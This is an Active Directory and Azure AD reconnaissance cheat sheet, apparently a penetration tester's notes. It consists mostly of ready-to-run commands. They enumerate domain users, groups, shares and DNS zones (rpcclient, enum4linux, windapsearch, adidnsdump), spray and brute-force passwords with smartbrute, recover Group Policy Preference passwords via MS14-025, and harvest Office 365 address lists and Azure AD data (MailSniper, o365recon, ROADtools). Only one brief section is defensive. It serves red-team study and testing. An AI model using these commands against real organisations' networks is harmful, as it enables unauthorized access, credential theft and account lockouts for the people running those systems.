Domain Recon

Tips

# Enumerate sessions
net session \\computer

Domain Properties

rpcclient

# You can use rpc to enumerate domain objects
rpcclient -U <user> <IP-DC>

rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> querygroupmem 0x200
rpcclient $> srvinfo
rpcclient $> querygroup 0x42
rpcclient $> queryuser 0x42
rpcclient $> getdompwinfo
rpcclient $> getusrdompwinfo 0x42

enum4linux

# You can use enum4linux to enumerate domain users
# You can try anonymous binding
sudo enum4linux domaine.fr
./enum4linux.pl -R 1090-1200

# When using authenticated users, you need to provide options for enumeration
$ enum4linux -a -u "DOMAIN\\user" -p "pass" xx.xx.xx.xx
# enum4linux-ng is a rewrite of the official tool (python3)
# adding some features like colors and parsing
https://github.com/cddmp/enum4linux-ng

windapsearch

# windapsearch is also a very good tool to perform automated LDAP queries
# Enumerate users
./windapsearch.py -d lab.ropnop.com -u ropnop\\ldapbind -p GoCubs16 -U
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -U

# enumerate all entries in objectCategory=group
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -G

# Query group membership
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -m <CN/OU>

# Enumerate all domain admins and people having equivalent rights
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 --da

# Enumerate all computers
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -C

# Custom search
./windapsearch.py -dc-ip 10.10.10.10 -u ropnop\\ldapbind -p GoCubs16 -s <stringToSearch>

Pywerview

python pywerview.py get-netuser -w GALACTIC.LAN -u d.traya --dc-ip 192.168.56.103 --username d.traya 
python pywerview.py get-netgroup -w GALACTIC.LAN -u d.traya --dc-ip 192.168.56.103 --username d.vador

Built-in functions

https://twitter.com/NinjaParanoid/status/1407137264283504640/photo/1

# You can use [adsisearcher] to enumerate AD objects
PS> ([adsisearcher])"(&(objectcategory=useer)(userAccountControl:1.2.840.113556.1.4.803:=65536))").findAll()

Users and Passwords

Smartbrute

https://github.com/ShutdownRepo/smartbrute
# The smart password spraying and bruteforcing tool for Active Directory Domain Services.

# Smart mode
# This mode can be used to make sure NOT to lock any account when bruteforcing by:
# Fetching the enabled users from Active Directory
# Fetching bad password count for each user
# Fetching lockout policies
# Bruteforcing users according to the information found
smartbrute.py -v smart -bP passwords.txt ntlm -d domain.local -u user -p password kerberos

# Brute mode
# The brute mode doesn't require prior knowledge of a low-priv user credentials but doesn't 
# have safety features like the smart mode. This mode CAN effectively lock accounts

SMB & Share

Basic enumeration

# Enumerate hostname
nmblookup -A <victim_ip>
enum4linux -n <victim_ip>
$ nmap --script=smb-enum* --script-args=unsafe=1 -T5 <victim_ip>

# Check for null sessions
smbmap -H <victim_ip>

# Checking for vulns
nmap --script smb-vuln* -p139,445 -T4 -Pn <victim_ip>

Smbclient

# Using smbclient
smbclient -L <IP>
smbclient -U GALACTIC.LAN\\d.vador -L //10.69.88.10

# You can recursively download a folder
smb: > recurse ON
smb: > prompt OFF
smb: > mget *

SYSVOL & MS14-025

# You can browse SMB share using smbclient
# The SYSVOL share contains GPO, you can look for a MS14-025
smbclient -U user //10.34.67.4/SYSVOL

# Instead of remotely connecting to SYSVOL and manually search
# You can mount it locally and grep for informations
# FASTER!
sudo mount -t cifs -o username=domainUser,domainn=domain.com //IP/SYSVOL
# MS14-025
→ smb: \NORZH.LAN\Policies\{195471B6-B0C6-4AD2-9853-28E2B4E9CEF6}\Machine\Preferences\Groups\Groups.xml
→ gpp-decrypt password

# The following tool allows a great decryption
https://github.com/lucasko/gpp-encrypt-decrypt
# If you ever need to recreate this vulnerability
# You can encrypt a password using the following
https://gchq.github.io/CyberChef/#recipe=AES_Encrypt(%7B'option':'Hex','string':'4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D)To_Base64('A-Za-z0-9%2B/%3D')&input=cGFzcw

CrackMapExec & Impacket

# Impacket SMB/MSRPC tools
# lookupsids → SID Bruteforce through MSRPC Interface
# samrdump → SAM Remote Interface (MSRPC) to extract system users, available share etc.
# services → Used to (start, stop, delete, status, config, list, create, change) services through MSRPC interface
# netview → Get a list of opened sessions and keep tracks of who logged in/off from remote targets
# smbclient → generic SMB client
# rpcdump → This script will dump the list of RPC endpoints and string bindings registered at the target.
# reg → Remote registry manipulation tool through the [MS-RRP] MSRPC Interface.
tool.py domain\user:password@IP <command/parameter>

# You can list all shares on a shares on a machine to find potential entry points
cme smb 10.69.88.23 -u user -p password --shares

Defensive

# DEFENSIVE POINT OF VIEW
# You can list active SMB sessions
C:\> net session
# And kill them
C:\> net session \[LinuxIPaddr] /del

DNS zones

https://github.com/dirkjanm/adidnsdump
https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/

# By default any user in Active Directory can enumerate all DNS records in the Domain 
# or Forest DNS zones, similar to a zone transfer. 
# This tool enables enumeration and exporting of all DNS records in the zone for 
# recon purposes of internal networks.

# Get DNS zones
$ adidnsdump -u icorp\\testuser --print-zones icorp-dc.internal.corp

# Get zone content
$ adidnsdump -u icorp\\testuser --zone zonename icorp-dc.internal.corp

Azure AD Recon

# Applications using Azure API Management
# Requests made to that
<name>.azure-api.net

# Documentation and more
<name>.portal.azure-api.net

# Gateway
<name>.azure-api.net

# Dev
<name>.portal.azure-api.net
<name>.developer.azure-api.net

# Management
<name>.management.azure-api.net

# Git
<name>.scm.azure-api.net
https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html

# Tool o365recon can be used (https://github.com/nyxgeek/o365recon)
# It mainly uses MS Online Powershell module

PS> Connect-MsolService
PS> powershell -ep bypass .\o365recon.ps1 -outputfile TEST_OUTPUT

# The -users_detailed flag can be used in order to query more information about users
# LastDirSyncTime empty == User only exist in the cloud

# The id suffixed to the SYNC cloud account == same id for the MSOL account belonging to the on-premises Active Directory

# You can also list Azure AD roles and members (cf attached link)

# MailSniper can also be used to get the Adress List
PS C:\> Get-GlobalAddressList -ExchHostname outlook.office365.com -UserName xxxx -Password xxxx -OutFile xxxx

# And associated usernames
PS C:\> Get-ADUsernameFromEWS -EmailList list.txt -ExchHostname outlook.office365.com -Remote
# C# Module for Azure AD enumeration
https://twitter.com/benpturner/status/1384595006917431301?s=19
https://gist.github.com/benpturner/c7376718558bb118111c7cad651a25ce
# When having admin privileges you can check for MFA for users
PS C:\> Connect-MsolService
PS C:\> Get-MsolUser -EnabledFilter EnabledOnly -MaxResults 50000 | select DisplayName,UserPrincipalName,@{N="MFA Status"; E={ if( $_.StrongAuthenticationRequirements.State -ne $null){ $_. StrongAuthenticationRequirements.State} else { "Disabled"}}} | export-csv mfaresults.csv
# ROADTools (https://github.com/dirkjanm/ROADtools)*
# It uses an internal undocumented version of Microsoft Graph API

PS C:\> roadrecon.exe auth -u user@domain
Tokens were written to .roadtools_auth

PS C:\> roadrecon.exe dump

PS C:\> roadrecon-gui.exe -debug -d .\roadrecon.db
 * Serving Flask app "roadtools.roadrecon.server" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

# Plugin for getting Conditional Access Policies
PS C:\> roadrecon plugin policies